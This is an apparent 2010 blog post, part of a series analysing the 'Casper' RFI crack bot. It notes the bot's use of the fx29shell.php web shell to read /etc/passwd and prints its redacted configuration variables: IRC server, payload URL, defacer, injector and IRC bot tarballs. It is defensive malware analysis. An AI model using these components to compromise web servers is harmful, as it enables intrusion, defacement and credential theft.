Irregular Expressions

Aug 22 2010   9:44PM GMT

Casper RFI crack bot – Part 5

Dan O'Connor Dan O'Connor Profile: Dan O'Connor

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de, both sites are no longer up and have not been for a while.

There is also a few things worth looking in to here, the script mentions fx29shell.php.  Which is a php shell that can be loaded onto the system.

I can do all kinds of nasty to your web server, you can download the /etc/passwd for a start. Not good if you find this on your system, might be a good time to do some google searches against your domain (while we are talking about it).

So after all of this it looks likes capser.(pl|txt) is the main thing doing all of the work. As you can tell with all of the variables.

$admin       = "XXXXX";
$serverircs  = array("irc.xxxxx.xxx");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";

In the next section we will do a closer look at casper now that we poked around a bit.

 Comment on this Post

 
There was an error processing your information. Please try again later.
Thanks. We'll let you know when a new response is added.
Send me notifications when other members comment.

REGISTER or login:

Forgot Password?
By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy

Forgot Password

No problem! Submit your e-mail address below. We'll send you an e-mail containing your password.

Your password has been sent to: